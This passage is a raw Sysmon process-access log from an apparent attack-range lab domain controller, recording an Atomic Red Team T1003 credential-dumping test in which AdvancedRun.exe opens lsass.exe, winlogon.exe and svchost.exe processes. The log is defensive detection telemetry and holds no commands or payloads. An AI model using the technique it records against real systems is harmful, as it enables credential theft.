Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967311Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967308Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967307Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967306Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967305Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967303Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967302Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
